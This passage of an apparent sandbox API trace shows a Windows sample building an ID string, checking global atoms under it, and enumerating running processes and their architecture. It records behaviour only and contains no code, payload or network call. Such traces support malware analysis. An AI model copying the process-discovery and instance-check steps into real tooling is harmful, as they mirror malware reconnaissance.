	[0096.425] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.426] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetLastError () returned 0x5
	[0096.427] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.427] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.427] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.427] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.427] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.427] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.427] CloseHandle (hObject=0x248) returned 1
	[0096.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.428] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.428] CloseHandle (hObject=0x248) returned 1
	[0096.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65aca8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.428] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.428] CloseHandle (hObject=0x248) returned 1
	[0096.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16638) returned 0xc0000004
	[0096.514] VirtualAlloc (lpAddress=0x0, dwSize=0x16738, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16738, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65add8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.520] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.520] CloseHandle (hObject=0x248) returned 1
	[0096.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658dc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.521] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.521] CloseHandle (hObject=0x248) returned 1
	[0096.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.522] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.522] CloseHandle (hObject=0x248) returned 1
	[0096.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.522] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.522] CloseHandle (hObject=0x248) returned 1
	[0096.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.522] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.522] CloseHandle (hObject=0x248) returned 1
	[0096.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.523] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.523] CloseHandle (hObject=0x248) returned 1
	[0096.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x6590a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.523] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.523] CloseHandle (hObject=0x248) returned 1
	[0096.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fe90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.523] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.523] CloseHandle (hObject=0x248) returned 1
	[0096.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.524] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.524] CloseHandle (hObject=0x248) returned 1
	[0096.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.524] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.524] CloseHandle (hObject=0x248) returned 1
	[0096.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.525] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.525] CloseHandle (hObject=0x248) returned 1
	[0096.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658ee8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.525] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.525] CloseHandle (hObject=0x248) returned 1
	[0096.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658d68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.525] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.525] CloseHandle (hObject=0x248) returned 1
	[0096.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ac68, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.526] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.526] CloseHandle (hObject=0x248) returned 1
	[0096.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x6590a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.526] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.526] CloseHandle (hObject=0x248) returned 1
	[0096.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.526] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.526] CloseHandle (hObject=0x248) returned 1
	[0096.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658ee8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.526] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.526] CloseHandle (hObject=0x248) returned 1
	[0096.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.527] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.527] CloseHandle (hObject=0x248) returned 1
	[0096.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.527] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.527] CloseHandle (hObject=0x248) returned 1
	[0096.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x6590a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.527] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.527] CloseHandle (hObject=0x248) returned 1
	[0096.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.528] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.528] CloseHandle (hObject=0x248) returned 1
	[0096.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.528] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.528] CloseHandle (hObject=0x248) returned 1
	[0096.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
